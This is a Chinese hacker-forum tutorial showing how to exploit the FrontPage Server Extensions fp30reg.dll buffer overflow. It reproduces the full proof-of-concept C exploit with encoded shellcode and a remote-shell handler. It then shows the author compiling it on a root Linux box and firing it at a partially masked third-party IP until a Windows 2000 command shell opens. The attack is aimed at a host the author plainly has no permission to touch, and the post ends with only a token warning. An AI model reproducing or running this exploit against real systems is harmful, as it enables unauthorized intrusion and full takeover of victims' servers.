front page server溢出攻击实例<>
下 载:http://www.nsfocus.com/proof/fpse2000ex.c
哈哈~大家好!!~(一上来就骂人??!)危卵~真实越来越"厉害"了,全一段时间的.printer硝烟未尽,现在又出来一个frontpage server fp30reg.dll溢出漏洞~不过便宜新手们了……(嘿嘿~!)关于该漏洞的资料看本站上面的公告!(bytes~!废话好多!)
言归正传..今天我给大家讲讲怎么利用..
先找一个,小羊羔~~(啊~小鬼子又进村了!!~?)嗯~~~谁呢??就你吧—61.153.xxx.xxx(国内的~别抓我啊~!!我不想坐牢!!).ping一下先,别timed out!就god!!!了~哈哈!:
pinging 61.153.xxx.xxxwith 32 bytes of data:
reply from 61.153.xxx.xx: bytes=32 time=36ms ttl=124
reply from 61.153.xxx.xx: bytes=32 time=35ms ttl=124
reply from 61.153.xxx.xx: bytes=32 time=35ms ttl=124
………………(啊哈~!速度不错~不拿你开刀我都找不到理由~!~哈哈~!我邪恶吗??)
let me start…
telnet 211.100.xxx.xxx(my fat hen,haha)
red hat linux release 7.0.1j (guinness)(羡慕吧??~~哈哈)
kernel 2.2.16-22 on an i686
login: bytes
passwd:xxxxxxx(当然不告诉你la)
[root@glb-linux-1 bytes]#id
uid=0 (root) gid=2513(other)(嘿嘿~@!)
[root@glb-linux-1 bytes]# vi kill.c (copy来原码,顺便说一句,这段程序很漂亮~!!)
/*
* fpse2000ex.c – proof of concept code for fp30reg.dll overflow bug.
* copyright (c) 2001 – nsfocus.com
*
* disclaims:
* this is a proof of concept code. this code is for test purpose
* only and should not be run against any host without permission from
* the system administrator.
*
* nsfocus security team
* http://www.nsfocus.com
*/
/* # 前面这里是版权信息,以及程序说明*/
#include
#include
#include
#include
#include
#include
#include
#include
/* fat shellcode */
/* # shellcode比较多 */
char shellcode[] =
"\xeb\x1a\x5f\x56\x56\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x5\x34"
"\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe1\xff\xff\xff\xff\x21\x46\x2b\x46"
"\xb6\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x4e\x5c\x55\x55\x13\xed\xa8\xaa\xaa\x12"
"\x66\x66\x66\x66\x59\x1\x6d\x2f\x66\x5d\x55\x55\xaa\xaa\xaa\xaa\x21\xef\xa2"
"\x21\x22\x2e\xaa\xaa\xaa\x23\x27\x62\x5d\x55\x55\x21\xff\xa2\x21\x28\x22\xaa"
"\xaa\xaa\x23\x2f\x6e\x5d\x55\x55\x21\xe7\xa2\x21\xfb\xa2\x23\x3f\x6a\x5d\x55"
"\x55\x43\x61\xaf\xaa\xaa\x25\x2f\x16\x5d\x55\x55\x27\x17\x5a\x5d\x55\x55\xce"
"\xb\xaa\xaa\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x2f\x5a\x5d"
"\x55\x55\x55\x55\x55\x55\x21\x2f\x16\x5d\x55\x55\x29\x42\xad\x23\x2f\x5e\x5d"
"\x55\x55\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x4a\xdd\x42\xcd\xaf\xaa\xaa\x29\x17"
"\x66\x5d\x55\x55\xaa\xa5\x2f\x77\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x2b\x6b"
"\xaa\xaa\xab\xaa\x23\x27\x12\x5d\x55\x55\x2b\x17\x12\x5d\x55\x55\xaa\xaa\xaa"
"\xd2\xdf\xa0\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x3f\x12\x5d\x55\x55"
"\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x2f\x30\x70\xab\xaa\xaa\x21\x27"
"\x12\x5d\x55\x55\x21\xfb\x96\x21\x2f\x12\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba"
"\x2b\x53\xfa\xef\xaa\xaa\xa5\x2f\xd3\xab\xaa\xaa\x21\x3f\x12\x5d\x55\x55\x21"
"\xe8\x96\x21\x27\x12\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x3f\x12\x5d\x55\x55\x23"
"\x3f\x1e\x5d\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x12\x5d\x55"
"\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x2b\x90\xe1\xef\xf8\xe4\xa5"
"\x2f\x99\xab\xaa\xaa\x21\x2f\x6\x5d\x55\x55\x2b\xd2\xae\xef\xe6\x99\x98\xa5"
"\x2f\x8a\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x23\x27\xe\x5d\x55\x55\x21\x3f"
"\x1e\x5d\x55\x55\x21\x2f\x12\x5d\x55\x55\xa9\xe8\x8a\x23\x2f\x6\x5d\x55\x55"
"\x6d\x2f\x2\x5d\x55\x55\xaa\xaa\xaa\xaa\x41\xb4\x21\x27\x2\x5d\x55\x55\x29\x6b"
"\xab\x23\x27\x2\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x29\x68\xae\x23\x3f\x6\x5d"
"\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\x27\x2\x5d\x55\x55\x91\xe2\xb2\xa5\x27"
"\x6a\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8\x21\x27\x12\x5d\x55\x55\x2b"
"\x96\xab\xed\xcf\xde\xfa\xa5\x2f\xa\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8"
"\x21\x27\x12\x5d\x55\x55\x2b\xd6\xab\xae\xd8\xc5\xc9\xeb\xa5\x2f\x2e\xaa\xaa"
"\xaa\x21\x3f\x2\x5d\x55\x55\xa9\x3f\x2\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55"
"\x21\x2f\x1e\x5d\x55\x55\x21\xe2\x8e\x99\x6a\xcc\x21\xae\xa0\x23\x2f\x6\x5d"
"\x55\x55\x21\x27\x1e\x5d\x55\x55\x21\xfb\xba\x21\x2f\x6\x5d\x55\x55\x27\xe6"
"\xba\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55"
"\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55\x21\x2f"
"\x1e\x5d\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x3f\x6\x5d\x55\x55\x21\x2f\x6\x5d"
"\x55\x55\xa9\x2f\x12\x5d\x55\x55\x23\x2f\x66\x5d\x55\x55\x41\xaf\x43\xa7\x55"
"\x55\x55\x43\xbc\x54\x55\x55\x27\x17\x5a\x5d\x55\x55\x21\xed\xa2\xce\x9\xaa"
"\xaa\xaa\xaa\x29\x17\x66\x5d\x55\x55\xaa\xdf\xaf\x43\xf4\xa9\xaa\xaa\x6d\x2f"
"\x6\x5d\x55\x55\xab\xaa\xaa\xaa\x41\xa5\x21\x27\x6\x5d\x55\x55\x29\x6b\xab\x23"
"\x27\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xa2\xd7\xc4\x21\x5e\x21\x3f\x16"
"\x5d\x55\x55\xf8\x21\x2f\xe\x5d\x55\x55\xfa\x55\x3f\x66\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x21\x27\x6\x5d\x55\x55\x23\x2e\x27\x7a\x5d\x55\x55\x41"
"\xa5\x21\x3f\x16\x5d\x55\x55\x29\x68\xab\x23\x3f\x16\x5d\x55\x55\x21\x2f\x16"
"\x5d\x55\x55\xa5\x14\xa2\x2f\x63\xdf\xba\x21\x3f\x16\x5d\x55\x55\xa5\x14\xe8"
"\xab\x2f\x6a\xde\xa8\x41\xa8\x41\x78\x21\x27\x16\x5d\x55\x55\x29\x6b\xab\x23"
"\x27\x16\x5d\x55\x55\x43\xd0\x55\x55\x55\x6d\x2f\x8e\x5d\x55\x55\xa6\xaa\xaa"
"\xaa\x6d\x2f\x82\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x2f\x86\x5d\x55\x55\xab\xaa"
"\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xe2\x5d\x55\x55"
"\xfa\x27\x27\xe6\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xea\x5d\x55\x55"
"\xfa\x27\x27\xee\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x27\x17\xca\x5d\x55\x55\x99\x6a\x13\xbb\xaa\xaa\xaa\x58\x1\x6d\x2f"
"\x26\x5d\x55\x55\xab\xab\xaa\xaa\xcc\x6d\x2f\x3a\x5d\x55\x55\xaa\xaa\x21\x3f"
"\xee\x5d\x55\x55\x23\x3f\x32\x5d\x55\x55\x21\x2f\xe2\x5d\x55\x55\x23\x2f\x36"
"\x5d\x55\x55\x21\x27\xe2\x5d\x55\x55\x23\x27\xa\x5d\x55\x55\x6d\x2f\x6\x5d\x55"
"\x55\xaa\xaa\xaa\xaa\x21\x5e\x27\x3f\xfa\x5d\x55\x55\xf8\x27\x2f\xca\x5d\x55"
"\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa\x21\x27\x16\x5d\x55"
"\x55\xfb\xc0\xaa\x55\x3f\x72\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x2f"
"\x6\x5d\x55\x55\x21\x3f\x16\x5d\x55\x55\x29\x68\xa2\x23\x3f\x16\x5d\x55\x55"
"\x21\x5e\xc0\xaa\xc0\xaa\x27\x2f\x96\x5d\x55\x55\xfa\xc2\xaa\xa2\xaa\xaa\x27"
"\x27\x56\x5d\x55\x55\xfb\x21\x3f\xe6\x5d\x55\x55\xf8\x55\x3f\x4a\x5d\x55\x55"
"\x91\x5e\x3a\xe9\xe1\xe9\xe1\x6d\x2f\x6\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e"
"\xc0\xaa\x27\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\x29\x6b\xa3\xfb"
"\x21\x3f\x6a\x5d\x55\x55\xf8\x55\x3f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
"\xe1\x12\xab\xaa\xaa\xaa\x2f\x6a\xa5\x2e\xf4\xab\xaa\xaa\x21\x5e\xc0\xaa\xc0"
"\xaa\x27\x27\x96\x5d\x55\x55\xfb\xc2\xaa\xa2\xaa\xaa\x27\x3f\x56\x5d\x55\x55"
"\xf8\x21\x2f\xe6\x5d\x55\x55\xfa\x55\x3f\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x29\x17\x96\x5d\x55\x55\xaa\xd4\xcb\x21\x5e\xc0\xaa\x27\x27\x96\x5d"
"\x55\x55\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27"
"\xe6\x5d\x55\x55\xfb\x55\x3f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29"
"\x17\x96\x5d\x55\x55\xaa\xd4\x8c\x21\x5e\xc0\xaa\x27\x3f\x96\x5d\x55\x55\xf8"
"\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x62\x5d\x55"
"\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x68\xaa\xaa\xaa\x6d\x2f\x96\x5d\x55\x55"
"\xaa\xa2\xaa\xaa\x21\x5e\x27\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55"
"\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x23\x2f\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xab\xde\xf2\x6d\x2f\x6"
"\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x6\x5d\x55\x55\xf8\x21"
"\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\xfb\x21\x3f\xea\x5d\x55\x55"
"\xf8\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x12\xab\xaa\xaa\xaa"
"\x2f\x6a\xde\xbc\x21\x5e\xc2\x55\x55\x55\xd5\x55\x3f\x46\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x41\x4b\x41\x87\x21\x5e\xc0\xaa\x27\x27\x96\x5d\x55\x55"
"\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\xea\x5d"
"\x55\x55\xfb\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x3f\x54"
"\x55\x55\x41\x54\xf2\xfa\x21\x17\x16\x5d\x55\x55\x23\xed\x58\x69\x21\xee\x8e"
"\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\x9a"
"\x50\x55\x55\xe9\xd8\xcf\xcb\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde"
"\xcf\xfa\xd8\xc5\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce"
"\xc6\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa\xf8\xcf"
"\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3\xc6\xcf\xaa\xf9\xc6"
"\xcf\xcf\xda\xaa\xaa\xc9\xc7\xce\x84\xcf\xd2\xcf\xaa\xa7\xa0\xcf\xd2\xc3\xde"
"\xa7\xa0\xaa\xf2\xe5\xf8\xee\xeb\xfe\xeb\xaa";
/* # 没下趴下吧?*/
int
resolv (char *host, long *ip)
{
struct hostent *hp;
if ((*ip = inet_addr (host))<0)
{
if ((hp = gethostbyname (host)) == null)
{
fprintf (stderr, "%s: unknown host\n", host);
exit (-1);
}
*ip = *(unsigned long *) hp->h_addr;
}
return 0;
}
int
connect_to (char *hostname, short port)
{
struct sockaddr_in sa;
int s;
s = socket (af_inet, sock_stream, 0);
resolv (hostname, (long *) &sa.sin_addr.s_addr);
sa.sin_family = af_inet;
sa.sin_port = htons (port);
if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == -1)
{
perror("connect");
exit(-1);
}
return s;
}
void
runshell (int sockd)
{
char buff[1024];
int ret;
fd_set fds;
printf("\npress ctrl_c to exit the shell!\n");
for (;
{
fd_zero (&fds);
fd_set (0, &fds);
fd_set (sockd, &fds);
if (select (sockd + 1, &fds, null, null, null) < 0)
{
exit (-1);
}
if (fd_isset (sockd, &fds))
{
bzero (buff, sizeof buff);
if ((ret=read(sockd,buff,sizeof(buff)))<1)
{
fprintf (stderr, "connection closed\n");
exit (-1);
}
write(1,buff,ret);
}
if (fd_isset (0, &fds))
{
bzero (buff, sizeof buff);
ret=read(0,buff,sizeof(buff));
write(sockd,buff,ret);
}
}
}
main (int argc, char **argv)
{
char overbuff[400];
char buff[4096];
/* if system has the unicode bug, it is possible to attack fp4areg.dll */
/* char fppath[] = "/_vti_bin/..%c1%9cbin/fp4areg.dll"; */
char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll";
char server[] = "www.blahblah.com";
char retaddress[] = "\x62\x18\xd5\x67";
char jmpshell[] = "\xff\x66\x78";
int i, sockfd;
int port = 80;
if (argc < 2)
{
printf ("proof of concept code for fp30reg.dll overflow bug by nsfocus security team\n\n");
printf ("usage: %s victim [port]\n", argv[0]);
exit (-1);
}
if (argc > 2) port = atoi (argv[2]);
sockfd = connect_to (argv[1], port);
bzero (overbuff, sizeof (overbuff));
bzero (buff, sizeof (buff));
memset (overbuff, a, 258);
memcpy (overbuff, jmpshell, strlen (jmpshell));
strcpy (overbuff + 258, "%c");
for (i = 0; i < 0x50; i += 4)
strncat (overbuff, retaddress, 4);
strcat (overbuff, "aaa");
sprintf (buff,
"get %s?%s http/1.1 \nhost:%s\r\ncontent-type: \
text/html\ncontent-length:%d\r\nproxy_connection: keep-alive\r\n\r\n%s",
fppath, overbuff, server, strlen (shellcode), shellcode);
printf ("buff len = %d\n", strlen (buff));
write (sockfd, buff, strlen (buff));
printf ("payload sent!\n");
if(read (sockfd, buff, strlen(buff))<0)
{
printf("eof\n");
exit(-1);
}
else
{
if(memcmp(buff,"xordata",8)==0)
{
printf("exploit succeed\n");
/* press enter key to get the command prompt */
runshell (sockfd);
}
else
{
printf("exploit failed\n");
close(sockfd);
exit(-1);
}
}
}
:w
:q(保存并退出)
[root@glb-linux-1 bytes]# gcc -o kill kill.c(编译成功)
[root@glb-linux-1 bytes]# ./kill(看一下说明先)
proof of concept code for fp30reg.dll overflow bug by nsfocus security team
usage: ./iis victim [port]
[root@glb-linux-1 bytes]# ./kill 61.153.xxx.xx 80
buff len = 2201
payload sent!
exploit failed (我bytes每次都没~死狗狗的狗运!!!哈哈)
[root@glb-linux-1 bytes]# ./kill 61.153.xxx.xx 80(再来~!)
buff len = 2201
payload sent!
exploit succeed
press ctrl_c to exit the shell!(宝贝宝贝宝贝~~~出来了哦~一个shell哈哈~!)
dir c:\
microsoft windows 2000 [version 5.00.2195](呀~win2k?!应该是iis5.0的,呜~我只有machinename权限~~~~5555555)
(c) 版权所有 1985-2000 microsoft corp.
c:\winnt\system32>cd c:\
c:\dir
……
接下来的作我向大家都会了,我也该下了~哈哈~不过我忠告各位一句,**破坏永远比建设容易**,所以~千万不要乱黑一气!!!
bye!!!
zzzzzzzzzzzzzzzzzzzzzzzz……
bytes
文章出处:第八军团
文章作者:bytes
扫一扫
8307
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
